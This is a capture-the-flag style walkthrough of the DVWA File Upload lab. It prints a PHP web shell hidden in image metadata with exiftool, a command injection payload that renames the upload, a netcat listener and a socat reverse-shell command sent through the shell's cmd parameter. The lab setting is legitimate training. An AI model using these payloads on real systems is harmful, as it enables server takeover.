DVWA - File Upload (Low/Med/High)

DVWA – File Upload (Low/Med/High)

In this walk through, we will be going through the File Upload vulnerability section from DVWA Labs. We will be exploring and learn about File Upload attacks and what makes an application vulnerable to it. We will start with the security level as Low and will gradually increase the difficulty as we progress further. So, let’s get started with the Hacking without any delay.

File Upload

File Upload Attacks:

File upload Attacks is an attack where an attacker is able to upload files to the server’s file system without any restrictions of name, type, contents, or size. Then, this might leads to the uploads of potentially malicious server side scripts that can be used later to perform Remote Code Execution on the target. The vulnerability can be occur in any file upload functionality in the application where there is insufficient input validation.

Security: Low (File Upload)

  • Setting the security level to low and PHPIDS as enabled.

Security level Low

  • We have a typical file upload functionality, let’s test it out if we can upload files on the server and able to view it after that.

Vulnerability: File Upload

  • I started with a basic image file first like rick.png however it throws me an error. Next, i tried a .jpg file and it worked.


Image not uploaded

File Upload

  • It prints out the location where the file has been stored. Let’s check it out.


uploads directory

Image File

  • As per the source code, there is no filtering done in the backend for specific filetypes.


  • Let’s exploit this and upload a PHP reverse shell on the server and see if we can take control of it by executing it. I will use the same one from Pentest Monkey that was also used in File inclusion section.

nc -lvnp

File Upload


netcat listener

Security: Medium (File Upload)

  • Setting the security level to Medium and PHPIDS as enabled.

Security level medium

  • I started directly upload our reverse shell that we have used in low security level but got struck with an error that the application can only JPEG or PNG images.

File Upload

  • When analyzing the source code, we found out that the application is checking if the uploaded file is a “image/jpeg” or “image/png” file. We have to bypass it.


  • I intercepted the upload request using burpsuite and changed the Content-Type to “image/jpeg” and the application was fooled by this as it was checking the content type and let it get uploaded to the server. We can achieve similar results by forging magic headers.

Burpsuite intercept

200 OK response

shell1.php uploaded successfully

  • Let’s execute our payload and get our reverse shell.



netcat listener

Security: High (File Upload)

  • Setting the security level to High and PHPIDS as enabled.

DVWA - File Upload (Low/Med/High)

  • By Analyzing the source code, i found out that the application is now checking the extension of the uploaded file with image file extensions like jpg, jpeg and png. Along with the meta content of the file which shows that file is actually an image file.


  • Now for this one, i tried a hell number of payloads. Changed the Magic Headers, tried different techniques like null characters and what not. At last, i used exiftool to manipulate the file meta data of an image file and add a php shell code in the comments which we will execute eventually. Next, i changed the file name to something like filename.php.jpg

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' joker.jpg
mv joji.jpg joji.php.jpg


  • Next, i tried uploading it and it went through.

File upload - joji.php.jpg

  • Next, we have to rename our file to joji.php as it won’t execute without that. For that, we have to leverage another vulnerability like Command Injection. Let’s do that by going to the Command Injection vulnerability section.|mv ../../hackable/uploads/joji.php.jpg ../../hackable/uploads/joji_shell.php

Command Injection

  • Next, execute it by going to the below URL.



  • Now let’s check if we can run commands.



  • We have to upgrade our shell. I have tried multiple things but most of them didn’t work. Next, i tried socat which i have also used in Command Injection section and it worked.


socat -d -d TCP-LISTEN:1234 -

http://localhost/hackable/uploads/joji_shell.php?cmd=socat -d -d TCP-CONNECT: exec:sh,pty,stderr,sane 


socat listener and getting shell

  • We can also use exiftool -DocumentName to store our payload in it. Upload it and then call it using file inclusion setting security to low.

Also Read: DVWA – DOM Based Cross Site Scripting (Low/Med/High)



So, we finally completed all the security levels for the DVWA File Upload Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential File Upload attacks by checking the file extensions against a whitelist of permitted extensions, renaming the uploaded files and not including them in the permanent filesystem until they have been fully validated. On that note, i will take your leave and will meet you in next one with another DVWA vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top